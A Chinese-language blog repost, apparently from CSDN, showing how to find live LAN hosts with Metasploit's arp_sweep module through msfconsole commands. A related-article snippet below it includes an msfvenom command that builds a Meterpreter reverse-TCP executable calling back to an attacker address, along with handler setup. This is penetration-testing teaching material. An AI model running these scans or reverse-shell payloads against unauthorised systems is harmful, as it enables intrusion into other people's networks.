利用Metasploit进行局域网活动主机扫描

最新推荐文章于 2022-05-07 22:08:02 发布
最新推荐文章于 2022-05-07 22:08:02 发布
阅读量1.2k 收藏 1
点赞数
文章标签: shell 网络
原文链接:https://my.oschina.net/xgcode/blog/232706
版权

Metasploit中提供了一些辅助模块可用于活跃主机的发现,这些模块位于Metasploit源码路径的modules/auxiliary/scanner/discovery/目录中,主要有以下几个:

1.arp_sweep

2.ipv6_multicast_ping

3.ipv6_neighbor

4.ipv6_neighbor_router_advertisement

5.udp_probe、udp_sweep。其中两个常用模块的主要功能为:

arp_sweep使用ARP请求枚举本地局域网络中的所有活跃主机。

udp_sweep通过发送UDP数据包探查指定主机是否活跃,并发现主机上的UDP服务。

我们在发送数据帧时要使用ARP协议(地址解析协议)将IP地址转化为MAC地址,因此我们可以使用发送APR请求来确定确定一个局域网中活跃主机。

代码如下:

root@bt :~# msfconsole    /*进入msfsonsole控制台  */

msf > use auxiliary/scanner/discovery/arp_sweep  /*加载模块  */

msf > show options

msf  auxiliary(arp_sweep) > set RHOSTS 192.168.0.0/24  /*设置目标IP 此处扫描192.168.0网段的所      有主机*/

RHOSTS => 192.168.0.0/24

msf  auxiliary(arp_sweep) > set THREADS 50   /*设置线程  */

msf  auxiliary(arp_sweep) > show options    /*查看信息  */、

msf  auxiliary(arp_sweep) > run       /*开始扫描  */、


转载于:https://my.oschina.net/xgcode/blog/232706

weixin_33775572
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
arp扫描
12-15
在渗透测试中,ARP扫描被用来识别网络上的活动主机、检测ARP欺骗或者执行中间人攻击。 1. 使用`arping`工具进行ARP扫描。`arping`是一个实用程序,它通过发送ARP请求来检查网络上是否存在特定的主机或所有主机。在...
【MSFconsole进阶】auxiliary模块:信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等
05-22 4282
【渗透工具】MSFconsole:auxiliary模块
Metasploit技术(二)——主机扫描
Phantom03167的博客
04-04 4434
主机扫描
内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)
网络安全领域___专研者.
03-22 1万+
Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用Win XP,然后对服务器进行渗透测试.
渗透测试知识点--选择题
热门推荐
m0_52996993的博客
01-07 2万+
RDP的端口号为() A. 3389 B. 23 C. 22 D. 443 Burp Suite 是用于攻击()的集成平台。 A. web 应用程序 B. 客户机 C. 服务器 D. 浏览器 使用nmap进行ping扫描时使用的参数() A. -sP B. -p C. -p0 ...
使用Metasploit进行内网渗透
m0_51468027的博客
05-07 1639
一、网络拓扑图 假如我们拿到了一台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限? 二、Win2008主机上线 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exe msfconsole use exploit/multi/handler set payload windows/meterpr
第二十五课:基于MSF发现内网存活主机第三季1
08-03
Metasploit是一款广泛使用的开源安全测试工具,它包含了大量的扫描器模块,可以帮助安全专家和渗透测试人员识别网络中的活动主机和开放服务。 第一季主要关注了以下五个扫描模块: 1. `auxiliary/scanner/...
第二十六课:基于MSF发现内网存活主机第四季1
08-03
本课程分为四季,分别介绍了Metasploit Framework(MSF)中的不同扫描模块,用于辅助检测网络中的活动主机。MSF是一个广泛使用的开源渗透测试工具,它包含了各种扫描器、利用模块、后渗透工具等,为安全专家提供了...
网络信息安全 渗透测试.pdf
最新发布
11-16
【实验过程】首先,通过fping、nping、netenum和netdiscover等多种命令行工具,对学生选定的10.1.74.114(Metasploitable2 Linux)进行活动主机扫描。接着,使用nmap和zenmap进行端口扫描,以确定哪些服务正在运行。...
网络信息安全渗透测试.docx
12-12
主机扫描是指扫描局域网活动主机的IP地址和MAC地址。端口扫描是指扫描目标主机的开放端口,以便发现可能存在的漏洞。漏洞扫描是指使用自动化工具来扫描目标系统中的漏洞,以便发现可能存在的安全问题。 在本次...
0x15.第十五课 MetaSploit实现内网存活telnet和http服务扫描.pdf
06-24
0x15.第十五课 MetaSploit实现内网存活telnet和http服务扫描.pdf
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
内网存活主机探测方式
good good study
01-25 3271
MSF一般用来扫描如永恒之蓝、cve-2019-0708漏洞,不建议用来扫描存活主机和端口,因为它流量比较明显,且容易卡
metasploit学习笔记之主机探测和端口扫描
CODING...
01-04 1万+
1.网站目录扫描: 可以借助metasploit中的brute_dir,dir_listing,dir_scanner等辅助模块来完成,主要使用暴力破解的方式工作。 可以看到,在这个testfire.net中存在有几个隐藏目录(返回代码403:没有权限访问) 2.使用search_email_collector搜集特定地址的邮件地址 search_email_collect
Metasploit系列(一) -- 简介及主机扫描
weixin_41489908的博客
01-09 655
不要为了一段糟透了的感情就去纵欲一生,我怕等你失魂落魄过后,才会知道荣光已逝,余生只剩残骸。。。 Metasploit框架(MSF)是一个开源工具,便于渗透测试。 一、环境:kali2019.04 二、打开终端,输入msfconsle 1、exploits:漏洞利用模块 通过对目标的扫描及漏洞证明等,探测出目标的漏洞或配置问题,然后利用exploit模块对目标机进行攻击。 2、auxiliary...
Metasploit---主机扫描
糖小喵
04-17 389
关注点:目标机器的ip地址、可用服务、开放端口 使用辅助模块进行端口扫描 首先利用search命令搜索有哪些可用端口模块:search portscan 以上为可用的扫描器列表,其中包含了各种扫描器类型,下面以TCP模块举例。 use auxiliary/scanner/portscan/tcp 使用show options命令查看需要设置的参数:show options ...
Metasploit使用内网跳板, 扫描局域网主机
dianyan5615的博客
06-21 1073
  最近,拿到一台内网机器, 苦于无法使用nmap扫描主机的内网, 所以才有此文   在跳板机子获取一定权限后,需要积极的向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的meterpreter后门,可以使系列的操作更容易。   使用Meterpreter内置的添加路由功能   获取路由信息 run get_local_subnets   ...
Metasploit实战四之——使用Metasploit中的NMap插件扫描并渗透内网主机
冰河的专栏
01-23 7749
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86609248 攻击机: Kali 192.168.175.128 靶机: WinXP 192.168.175.130 内网主机Metasploitable2 192.168.175.131 在上一篇《Metasploit实战三之——使用Metasploit获取目标的控...
使用msfconsole实现网段端口扫描
weixin_44053218的博客
09-06 2642
msfconsole实现网段端口扫描 在nmap中可以直接使用nmap,例如:扫描完整端口、服务及版本 使用portscan模块进行局域网IP搜索 使用use命令进行syn扫描 然后我们可以使用showo ptions显示相关需要配置的信息 注:在Required中显示no的才是我们需要设置的信息,其他yes的是可以不用设置的,当然,你看得懂设置也行 下面进行set赋值 扫描结果 Ct...
第一百零九课:依托 metasploit 尽可能多的发现目标内网下的各类高价值存活主机1
08-03
通过利用 metasploit 提供的模块,我们可以对目标内网进行全面的主机扫描和漏洞利用,从而快速获取目标主机的权限。 在实际操作中,我们首先需要通过 metasploit 中的 auxiliary 模块进行主机探测,发现目标内网中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值